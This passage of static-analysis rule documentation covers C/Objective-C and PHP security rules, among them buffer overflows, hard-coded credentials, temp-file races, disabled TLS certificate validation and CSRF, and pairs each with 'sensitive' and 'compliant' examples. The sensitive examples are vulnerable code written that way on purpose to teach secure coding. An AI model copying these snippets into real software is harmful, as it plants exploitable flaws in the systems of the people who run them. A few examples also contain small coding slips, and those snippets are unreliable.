    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

char* http_url = "http://example.com"; // Sensitive
char* ftp_url = "ftp://anonymous@example.com"; // Sensitive
char* telnet_url = "telnet://anonymous@example.com"; // Sensitive
#include <curl/curl.h>

CURL *curl_ftp = curl_easy_init();
curl_easy_setopt(curl_ftp, CURLOPT_URL, "ftp://example.com/"); // Sensitive

CURL *curl_smtp = curl_easy_init();
curl_easy_setopt(curl_smtp, CURLOPT_URL, "smtp://example.com:587"); // Sensitive

Compliant Solution

char* https_url = "https://example.com";
char* sftp_url = "sftp://anonymous@example.com";
char* ssh_url = "ssh://anonymous@example.com";
#include <curl/curl.h>

CURL *curl_ftps = curl_easy_init();
curl_easy_setopt(curl_ftps, CURLOPT_URL, "ftp://example.com/");
curl_easy_setopt(curl_ftps, CURLOPT_USE_SSL, CURLUSESSL_ALL); // FTP transport is done over TLS

CURL *curl_smtp_tls = curl_easy_init();
curl_easy_setopt(curl_smtp_tls, CURLOPT_URL, "smtp://example.com:587");
curl_easy_setopt(curl_smtp_tls, CURLOPT_USE_SSL, CURLUSESSL_ALL); // SMTP with STARTTLS

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Insecure protocol scheme followed by loopback addresses like 127.0.0.1 or localhost.

See

objc:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule looks for hard-coded credentials in variable names that match any of the patterns from the provided list.

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

dbi_conn conn = dbi_conn_new("mysql");
string password = "secret"; // Sensitive
dbi_conn_set_option(conn, "password", password.c_str());

Compliant Solution

dbi_conn conn = dbi_conn_new("mysql");
string password = getDatabasePassword(); // Compliant
dbi_conn_set_option(conn, "password", password.c_str()); // Compliant

See

objc:S5798

Why is this an issue?

The compiler is generally allowed to remove code that does not have any effect, according to the abstract machine of the C language. This means that if you have a buffer that contains sensitive data (for instance passwords), calling memset on the buffer before releasing the memory will probably be optimized away.

The function memset_s behaves similarly to memset, but the main difference is that it cannot be optimized away, the memory will be overwritten in all cases. You should always use this function to scrub security-sensitive data.

This rule raises an issue when a call to memset is followed by the destruction of the buffer.

Note that memset_s is defined in annex K of C11, so to have access to it, you need a standard library that supports it (this can be tested with the macro __STDC_LIB_EXT1__), and you need to enable it by defining the macro __STDC_WANT_LIB_EXT1__ before including <string.h>. Other platform specific functions can perform the same operation, for instance SecureZeroMemory (Windows) or explicit_bzero (FreeBSD)

Noncompliant code example

void f(char *password, size_t bufferSize) {
  char localToken[256];
  init(localToken, password);
  memset(password, ' ', strlen(password)); // Noncompliant, password is about to be freed
  memset(localToken, ' ', strlen(localToken)); // Noncompliant, localToken is about to go out of scope
  free(password);
}

Compliant solution

void f(char *password, size_t bufferSize) {
  char localToken[256];
  init(localToken, password);
  memset_s(password, bufferSize, ' ', strlen(password));
  memset_s(localToken, sizeof(localToken), ' ', strlen(localToken));
  free(password);
}

Resources

objc:S1079

Why is this an issue?

The %s placeholder is used to read a word into a string.

By default, there is no restriction on the length of that word, and the developer is required to pass a sufficiently large buffer for storing it.

No matter how large the buffer is, there will always be a longer word.

Therefore, programs relying on %s are vulnerable to buffer overflows.

A field width specifier can be used together with the %s placeholder to limit the number of bytes which will by written to the buffer.

Note that an additional byte is required to store the null terminator.

Noncompliant code example

char buffer[10];
scanf("%s", buffer);      // Noncompliant - will overflow when a word longer than 9 characters is entered

Compliant solution

char buffer[10];
scanf("%9s", buffer);     // Compliant - will not overflow

Resources

objc:S5443

Operating systems have global directories where any user has write access. Those folders are mostly used as temporary storage areas like /tmp in Linux based systems. An application manipulating files from these folders is exposed to race conditions on filenames: a malicious user can try to create a file with a predictable name before the application does. A successful attack can result in other files being accessed, modified, corrupted or deleted. This risk is even higher if the application runs with elevated permissions.

In the past, it has led to the following vulnerabilities:

This rule raises an issue whenever it detects a hard-coded path to a publicly writable directory like /tmp (see examples bellow). It also detects access to environment variables that point to publicly writable directories, e.g., TMP and TMPDIR.

  • /tmp
  • /var/tmp
  • /usr/tmp
  • /dev/shm
  • /dev/mqueue
  • /run/lock
  • /var/run/lock
  • /Library/Caches
  • /Users/Shared
  • /private/tmp
  • /private/var/tmp
  • \Windows\Temp
  • \Temp
  • \TMP

Ask Yourself Whether

  • Files are read from or written into a publicly writable folder
  • The application creates files with predictable names into a publicly writable folder

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a dedicated sub-folder with tightly controlled permissions
  • Use secure-by-design APIs to create temporary files. Such API will make sure:
    • The generated filename is unpredictable
    • The file is readable and writable only by the creating user ID
    • The file descriptor is not inherited by child processes
    • The file will be destroyed as soon as it is closed

Sensitive Code Example

#include <cstdio>
// ...

void f() {
  FILE * fp = fopen("/tmp/temporary_file", "r"); // Sensitive
}
#include <cstdio>
#include <cstdlib>
#include <sstream>
// ...

void f() {
  std::stringstream ss;
  ss << getenv("TMPDIR") << "/temporary_file"; // Sensitive
  FILE * fp = fopen(ss.str().c_str(), "w");
}

Compliant Solution

#include <cstdio>
#include <cstdlib>
// ...

void f() {
  FILE * fp = tmpfile(); // Compliant
}

See

objc:S2612

In Unix file system permissions, the "others" category refers to all users except the owner of the file system resource and the members of the group assigned to this resource.

Granting permissions to this category can lead to unintended access to files or directories that could allow attackers to obtain sensitive information, disrupt services or elevate privileges.

Ask Yourself Whether

  • The application is designed to be run on a multi-user environment.
  • Corresponding files and directories may contain confidential information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The most restrictive possible permissions should be assigned to files and directories.

Sensitive Code Example

When creating a file or directory with permissions to "other group":

open("myfile.txt", O_CREAT, S_IRWXU | S_IRWXG | S_IRWXO); // Sensitive: the process set 777 permissions to this newly created file

mkdir("myfolder", S_IRWXU | S_IRWXG | S_IRWXO); // Sensitive: the process try to set 777 permissions to this newly created directory

When explicitly adding permissions to "other group" with chmod, fchmod or filesystem::permissions functions:

chmod("myfile.txt", S_IRWXU | S_IRWXG | S_IRWXO);  // Sensitive: the process set 777 permissions to this file

fchmod(fd, S_IRWXU | S_IRWXG | S_IRWXO); // Sensitive: the process set 777 permissions to this file descriptor

When defining the umask without read, write and execute permissions for "other group":

umask(S_IRWXU | S_IRWXG); // Sensitive: the further files and folders will be created with possible permissions to "other group"

Compliant Solution

When creating a file or directory, do not set permissions to "other group":

open("myfile.txt", O_CREAT, S_IRWXU | S_IRWXG); // Compliant

mkdir("myfolder", S_IRWXU | S_IRWXG); // Compliant

When using chmod, fchmod or filesystem::permissions functions, do not add permissions to "other group":

chmod("myfile.txt", S_IRWXU | S_IRWXG);  // Compliant

fchmod(fd, S_IRWXU | S_IRWXG); // Compliant

When defining the umask, set read, write and execute permissions to other group:

umask(S_IRWXO); // Compliant: further created files or directories will not have permissions set for "other group"

See

objc:S1081

Why is this an issue?

When using typical C functions, it’s up to the developer to make sure the size of the buffer to be written to is large enough to avoid buffer overflows. Buffer overflows can cause the program to crash at a minimum. At worst, a carefully crafted overflow can cause malicious code to be executed.

This rule reports use of the following insecure functions, for which knowing the required size is not generally possible: gets() and getpw().

In such cases. The only way to prevent buffer overflow while using these functions would be to control the execution context of the application.

It is much safer to secure the application from within and to use an alternate, secure function which allows you to define the maximum number of characters to be written to the buffer:

  • fgets or gets_s
  • getpwuid

Noncompliant code example

gets(str); // Noncompliant; `str` buffer size is not checked and it is vulnerable to overflows

Compliant solution

gets_s(str, sizeof(str)); // Prevent overflows by enforcing a maximum size for `str` buffer

Resources

objc:S5814

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strcat( char *restrict dest, const char *restrict src ); appends the characters of string src at the end of dest. The wcscat does the same for wide characters and should be used with the same guidelines.

Note: the functions strncat and wcsncat might look like attractive safe replacements for strcat and wcscaty, but they have their own set of issues (see S5815), and you should probably prefer another more adapted alternative.

Ask Yourself Whether

  • There is a possibility that either the src or the dest pointer is null
  • The current string length of dest plus the current string length of src plus 1 (for the final null character) is larger than the size of the buffer pointer-to by src
  • There is a possibility that either string is not correctly null-terminated

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • C11 provides, in its annex K, the strcat_s and the wcscat_s that were designed as safer alternatives to strcat and wcscat. It’s not recommended to use them in all circumstances, because they introduce a runtime overhead and require to write more code for error handling, but they perform checks that will limit the consequences of calling the function with bad arguments.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strcpy(dest, "Result: ");
  strcat(dest, src); // Sensitive: might overflow
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char result[] = "Result: ";
  char *dest = malloc(sizeof(result) + strlen(src)); // Not need of +1 for final 0 because sizeof will already count one 0
  strcpy(dest, result);
  strcat(dest, src); // Compliant: the buffer size was carefully crafted
  int r = doSomethingWith(dest);
  free(dest);
  return r;
}

See

objc:S5813

The function size_t strlen(const char *s) measures the length of the string s (excluding the final null character).
The function size_t wcslen(const wchar_t *s) does the same for wide characters, and should be used with the same guidelines.

Similarly to many other functions in the standard C libraries, strlen and wcslen assume that their argument is not a null pointer.

Additionally, they expect the strings to be null-terminated. For example, the 5-letter string "abcde" must be stored in memory as "abcde\0" (i.e. using 6 characters) to be processed correctly. When a string is missing the null character at the end, these functions will iterate past the end of the buffer, which is undefined behavior.

Therefore, string parameters must end with a proper null character. The absence of this particular character can lead to security vulnerabilities that allow, for example, access to sensitive data or the execution of arbitrary code.

Ask Yourself Whether

  • There is a possibility that the pointer is null.
  • There is a possibility that the string is not correctly null-terminated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use safer functions. The C11 functions strlen_s and wcslen_s from annex K handle typical programming errors.
    Note, however, that they have a runtime overhead and require more code for error handling and therefore are not suited to every case.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions.
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone.

Sensitive Code Example

size_t f(char *src) {
  char dest[256];
  strncpy(dest, src, sizeof dest); // Truncation may happen
  return strlen(dest); // Sensitive: "dest" will not be null-terminated if truncation happened
}

Compliant Solution

size_t f(char *src) {
  char dest[256];
  strncpy(dest, src, sizeof dest); // Truncation may happen
  dest[sizeof dest - 1] = 0;
  return strlen(dest); // Compliant: "dest" is guaranteed to be null-terminated
}

See

  • MITRE, CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
  • CERT, STR07-C. - Use the bounds-checking interfaces for string manipulation
objc:S5816

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strncpy(char * restrict dest, const char * restrict src, size_t count); copies the first count characters from src to dest, stopping at the first null character, and filling extra space with 0. The wcsncpy does the same for wide characters and should be used with the same guidelines.

Both of those functions are designed to work with fixed-length strings and might result in a non-null-terminated string.

Ask Yourself Whether

  • There is a possibility that either the source or the destination pointer is null
  • The security of your system can be compromised if the destination is a truncated version of the source
  • The source buffer can be both non-null-terminated and smaller than the count
  • The destination buffer can be smaller than the count
  • You expect dest to be a null-terminated string
  • There is an overlap between the source and the destination

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • C11 provides, in its annex K, the strncpy_s and the wcsncpy_s that were designed as safer alternatives to strcpy and wcscpy. It’s not recommended to use them in all circumstances, because they introduce a runtime overhead and require to write more code for error handling, but they perform checks that will limit the consequences of calling the function with bad arguments.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions
  • If you are using strncpy and wsncpy as a safer version of strcpy and wcscpy, you should instead consider strcpy_s and wcscpy_s, because these functions have several shortcomings:
    • It’s not easy to detect truncation
    • Too much work is done to fill the buffer with 0, leading to suboptimal performance
    • Unless manually corrected, the dest string might not be null-terminated
  • If you want to use strcpy and wcscpy functions and detect if the string was truncated, the pattern is the following:
    • Set the last character of the buffer to null
    • Call the function
    • Check if the last character of the buffer is still null
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strncpy(dest, src, sizeof(dest)); // Sensitive: might silently truncate
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char dest[256];
  dest[sizeof dest - 1] = 0;
  strncpy(dest, src, sizeof(dest)); // Compliant
  if (dest[sizeof dest - 1] != 0) {
    // Handle error
  }
  return doSomethingWith(dest);
}

See

objc:S5815

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strncat( char *restrict dest, const char *restrict src, size_t count ); appends the characters of string src at the end of dest, but only add count characters max. dest will always be null-terminated. The wcsncat does the same for wide characters, and should be used with the same guidelines.

Ask Yourself Whether

  • There is a possibility that either the src or the dest pointer is null
  • The current string length of dest plus the current string length of src plus 1 (for the final null character) is larger than the size of the buffer pointer-to by src
  • There is a possibility that either string is not correctly null-terminated

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • C11 provides, in its annex K, the strncat_s and the wcsncat_s that were designed as safer alternatives to strncat and wcsncat. It’s not recommended to use them in all circumstances because they introduce a runtime overhead and require to write more code for error handling, but they perform checks that will limit the consequences of calling the function with bad arguments.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions
  • If you are using strncat and wsncat as a safer version of strcat and wcscat, you should instead consider strcat_s and wcscat_s because these functions have several shortcomings:
    • It’s not easy to detect truncation
    • The count parameter is error-prone
    • Computing the count parameter typically requires computing the string length of dest, at which point other simpler alternatives exist

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strcpy(dest, "Result: ");
  strncat(dest, src, sizeof dest); // Sensitive: passing the buffer size instead of the remaining size
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char result[] = "Result: ";
  char dest[256];
  strcpy(dest, result);
  strncat(dest, src, sizeof dest - sizeof result); // Compliant but may silently truncate
  return doSomethingWith(dest);
}

See

objc:S5824

The functions "tmpnam", "tmpnam_s" and "tmpnam_r" are all used to return a file name that does not match an existing file, in order for the application to create a temporary file. However, even if the file did not exist at the time those functions were called, it might exist by the time the application tries to use the file name to create the files. This has been used by hackers to gain access to files that the application believed were trustworthy.

There are alternative functions that, in addition to creating a suitable file name, create and open the file and return the file handler. Such functions are protected from this attack vector and should be preferred. About the only reason to use these functions would be to create a temporary folder, not a temporary file.

Additionally, these functions might not be thread-safe, and if you don’t provide them buffers of sufficient size, you will have a buffer overflow.

Ask Yourself Whether

  • There is a possibility that several threads call any of these functions simultaneously
  • There is a possibility that the resulting file is opened without forcing its creation, meaning that it might have unexpected access rights
  • The buffers passed to these functions are respectively smaller than
    • L_tmpnam for tmpnam
    • L_tmpnam_s for tmpnam_s
    • L_tmpnam for tmpnam_r

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a function that directly opens the temporary file, such a tmpfile, tmpfile_s, mkstemp or mkstemps (the last two allow more accurate control of the file name).
  • If you can’t get rid of these functions, when using the generated name to open the file, use a function that forces the creation of the file and fails if the file already exists.

Sensitive Code Example

int f(char *tempData) {
  char *path = tmpnam(NULL); // Sensitive
  FILE* f = fopen(tmpnam, "w");
  fputs(tempData, f);
  fclose(f);
}

Compliant Solution

int f(char *tempData) {
  // The file will be opened in "wb+" mode, and will be automatically removed on normal program exit
  FILE* f = tmpfile(); // Compliant
  fputs(tempData, f);
  fclose(f);
}

See

objc:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It misleads to use the same address in every environment (dev, sys, qa, prod).

Last but not least it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks can always be possible, but in the case of a hardcoded IP address solving the issue will take more time, which will increase an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code, instead make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentially is not required a domain name can be used since it allows to change the destination quickly without having to rebuild the software.

Sensitive Code Example

dbi_conn conn = dbi_conn_new("mysql");
string host = "10.10.0.1"; // Sensitive
dbi_conn_set_option(conn, "host", host.c_str());
dbi_conn_set_option(conn, "host", "10.10.0.1"); // Sensitive

Compliant Solution

dbi_conn conn = dbi_conn_new("mysql");
string host = getDatabaseHost(); // Compliant
dbi_conn_set_option(conn, "host", host.c_str()); // Compliant

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

objc:S4830

This vulnerability makes it possible that an encrypted communication is intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it in Botan

Code examples

The following code contains examples of disabled certificate validation.

The certificate validation gets disabled by overriding tls_verify_cert_chain with an empty implementation. It is highly recommended to use the original implementation.

Noncompliant code example

#include <botan/tls_client.h>
#include <botan/tls_callbacks.h>
#include <botan/tls_session_manager.h>
#include <botan/tls_policy.h>
#include <botan/auto_rng.h>
#include <botan/certstor.h>
#include <botan/certstor_system.h>

class Callbacks : public Botan::TLS::Callbacks
{
    virtual void tls_verify_cert_chain(
              const std::vector<Botan::X509_Certificate> &cert_chain,
              const std::vector<std::shared_ptr<const Botan::OCSP::Response>> &ocsp_responses,
              const std::vector<Botan::Certificate_Store *> &trusted_roots,
              Botan::Usage_Type usage,
              const std::string &hostname,
              const Botan::TLS::Policy &policy)
    override  { }
};

class Client_Credentials : public Botan::Credentials_Manager { };

void connect() {
    Callbacks callbacks;
    Botan::AutoSeeded_RNG rng;
    Botan::TLS::Session_Manager_In_Memory session_mgr(rng);
    Client_Credentials creds;
    Botan::TLS::Strict_Policy policy;

    Botan::TLS::Client client(callbacks, session_mgr, creds, policy, rng,
                              Botan::TLS::Server_Information("example.com", 443),
                              Botan::TLS::Protocol_Version::TLS_V12); // Noncompliant
}

Compliant solution

#include <botan/tls_client.h>
#include <botan/tls_callbacks.h>
#include <botan/tls_session_manager.h>
#include <botan/tls_policy.h>
#include <botan/auto_rng.h>
#include <botan/certstor.h>
#include <botan/certstor_system.h>

class Callbacks : public Botan::TLS::Callbacks { };

class Client_Credentials : public Botan::Credentials_Manager { };

void connect() {
    Callbacks callbacks;
    Botan::AutoSeeded_RNG rng;
    Botan::TLS::Session_Manager_In_Memory session_mgr(rng);
    Client_Credentials creds;
    Botan::TLS::Strict_Policy policy;

    Botan::TLS::Client client(callbacks, session_mgr, creds, policy, rng,
                              Botan::TLS::Server_Information("example.com", 443),
                              Botan::TLS::Protocol_Version::TLS_V12);
}

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.

To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.

Resources

Documentation

Standards

objc:S5801

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strcpy(char * restrict dest, const char * restrict src); copies characters from src to dest. The wcscpy does the same for wide characters and should be used with the same guidelines.

Note: the functions strncpy and wcsncpy might look like attractive safe replacements for strcpy and wcscpy, but they have their own set of issues (see S5816), and you should probably prefer another more adapted alternative.

Ask Yourself Whether

  • There is a possibility that either the source or the destination pointer is null
  • There is a possibility that the source string is not correctly null-terminated, or that its length (including the final null character) can be larger than the size of the destination buffer.
  • There is an overlap between source and destination

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • C11 provides, in its annex K, the strcpy_s and the wcscpy_s that were designed as safer alternatives to strcpy and wcscpy. It’s not recommended to use them in all circumstances, because they introduce a runtime overhead and require to write more code for error handling, but they perform checks that will limit the consequences of calling the function with bad arguments.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions, for example, strlcpy in FreeBSD
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strcpy(dest, src); // Sensitive: might overflow
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char *dest = malloc(strlen(src) + 1); // For the final 0
  strcpy(dest, src); // Compliant: we made sure the buffer is large enough
  int r= doSomethingWith(dest);
  free(dest);
  return r;
}

See

objc:S5802

The purpose of creating a jail, the "virtual root directory" created with chroot-type functions, is to limit access to the file system by isolating the process inside this jail. However, many chroot function implementations don’t modify the current working directory, thus the process has still access to unauthorized resources outside of the "jail".

Ask Yourself Whether

  • The application changes the working directory before or after running chroot.
  • The application uses a path inside the jail directory as working directory.

There is a risk if you answered no to any of those questions.

Recommended Secure Coding Practices

Change the current working directory to the root directory after switching to a jail directory.

Sensitive Code Example

The current directory is not changed with the chdir function before or after the creation of a jail with the chroot function:

const char* root_dir = "/jail/";
chroot(root_dir); // Sensitive: no chdir before or after chroot, and missing check of return value

The chroot or chdir operations could fail and the process still have access to unauthorized resources. The return code should be checked:

const char* root_dir = "/jail/";
chroot(root_dir); // Sensitive: missing check of the return value
const char* any_dir = "/any/";
chdir(any_dir); // Sensitive: missing check of the return value

Compliant Solution

To correctly isolate the application into a jail, change the current directory with chdir before the chroot and check the return code of both functions:

const char* root_dir = "/jail/";

if (chdir(root_dir) == -1) {
  exit(-1);
}

if (chroot(root_dir) == -1) {  // compliant: the current dir is changed to the jail and the results of both functions are checked
  exit(-1);
}

See

php:S2115

Why is this an issue?

When relying on the password authentication mode for the database connection, a secure password should be chosen.

This rule raises an issue when an empty password is used.

Noncompliant code example

// example of an empty password when connecting to a mysql database
$conn = new mysqli($servername, $username, "");

Compliant solution

// generate a secure password, set it to the username database, and store it in a environment variable for instance
$password = getenv('MYSQL_SECURE_PASSWORD');
// then connect to the database
$conn = new mysqli($servername, $username, $password);

Resources

php:S4502

A cross-site request forgery (CSRF) attack occurs when a trusted user of a web application can be forced, by an attacker, to perform sensitive actions that he didn’t intend, such as updating his profile or sending a message, more generally anything that can change the state of the application.

The attacker can trick the user/victim to click on a link, corresponding to the privileged action, or to visit a malicious web site that embeds a hidden web request and as web browsers automatically include cookies, the actions can be authenticated and sensitive.

Ask Yourself Whether

  • The web application uses cookies to authenticate users.
  • There exist sensitive operations in the web application that can be performed when the user is authenticated.
  • The state / resources of the web application can be modified by doing HTTP POST or HTTP DELETE requests for example.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Protection against CSRF attacks is strongly recommended:
    • to be activated by default for all unsafe HTTP methods.
    • implemented, for example, with an unguessable CSRF token
  • Of course all sensitive operations should not be performed with safe HTTP methods like GET which are designed to be used only for information retrieval.

Sensitive Code Example

For Laravel VerifyCsrfToken middleware

use Illuminate\Foundation\Http\Middleware\VerifyCsrfToken as Middleware;

class VerifyCsrfToken extends Middleware
{
    protected $except = [
        'api/*'
    ]; // Sensitive; disable CSRF protection for a list of routes
}

For Symfony Forms

use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;

class Controller extends AbstractController {

  public function action() {
    $this->createForm('', null, [
      'csrf_protection' => false, // Sensitive; disable CSRF protection for a single form
    ]);
  }
}

Compliant Solution

For Laravel VerifyCsrfToken middleware

use Illuminate\Foundation\Http\Middleware\VerifyCsrfToken as Middleware;

class VerifyCsrfToken extends Middleware
{
    protected $except = []; // Compliant
}

Remember to add @csrf blade directive to the relevant forms when removing an element from $except. Otherwise the form submission will stop working.

For Symfony Forms

use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;

class Controller extends AbstractController {

  public function action() {
    $this->createForm('', null, []); // Compliant; CSRF protection is enabled by default
  }
}

See

php:S4508

This rule is deprecated, and will eventually be removed.

Deserializing objects is security-sensitive. For example, it has led in the past to the following vulnerabilities:

Object deserialization from an untrusted source can lead to unexpected code execution. Deserialization takes a stream of bits and turns it into an object. If the stream contains the type of object you expect, all is well. But if you’re deserializing data coming from untrusted input, and an attacker has inserted some other type of object, you’re in trouble. Why? A known attack scenario involves the creation of a serialized PHP object with crafted attributes which will modify your application’s behavior. This attack relies on PHP magic methods like __desctruct, __wakeup or __string. The attacker doesn’t necessarily need the source code of the targeted application to exploit the vulnerability, he can also rely on the presence of open-source component and use tools to craft malicious payloads.

Ask Yourself Whether

  • an attacker could have tampered with the source provided to the deserialization function
  • you are using an unsafe deserialization function

You are at risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

To prevent insecure deserialization, it is recommended to:

  • Use safe libraries that do not allow code execution at deserialization.
  • Not communicate with the outside world using serialized objects
  • Limit access to the serialized source
    • if it is a file, restrict the access to it.
    • if it comes from the network, restrict who has access to the process, such as with a Firewall or by authenticating the sender first.

See

php:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production. Debug instructions or error messages can leak detailed information about the system, like the application’s path or file names.

Ask Yourself Whether

  • The code or configuration enabling the application debug features is deployed on production servers or distributed to end users.
  • The application runs by default with debug features activated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not enable debugging features on production servers or applications distributed to end users.

Sensitive Code Example

CakePHP 1.x, 2.x:

Configure::write('debug', 1); // Sensitive: development mode
or
Configure::write('debug', 2); // Sensitive: development mode
or
Configure::write('debug', 3); // Sensitive: development mode

CakePHP 3.0:

use Cake\Core\Configure;

Configure::config('debug', true); // Sensitive: development mode

WordPress:

define( 'WP_DEBUG', true ); // Sensitive: development mode

Compliant Solution

CakePHP 1.2:

Configure::write('debug', 0); // Compliant; this is the production mode

CakePHP 3.0:

use Cake\Core\Configure;

Configure::config('debug', false); // Compliant:  "0" or "false" for CakePHP 3.x is suitable (production mode) to not leak sensitive data on the logs.

WordPress:

define( 'WP_DEBUG', false ); // Compliant

See

php:S5042

Successful Zip Bomb attacks occur when an application expands untrusted archive files without controlling the size of the expanded data, which can lead to denial of service. A Zip bomb is usually a malicious archive file of a few kilobytes of compressed data but turned into gigabytes of uncompressed data. To achieve this extreme compression ratio, attackers will compress irrelevant data (eg: a long string of repeated bytes).

Ask Yourself Whether

Archives to expand are untrusted and:

  • There is no validation of the number of entries in the archive.
  • There is no validation of the total size of the uncompressed data.
  • There is no validation of the ratio between the compressed and uncompressed archive entry.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Define and control the ratio between compressed and uncompressed data, in general the data compression ratio for most of the legit archives is 1 to 3.
  • Define and control the threshold for maximum total size of the uncompressed data.
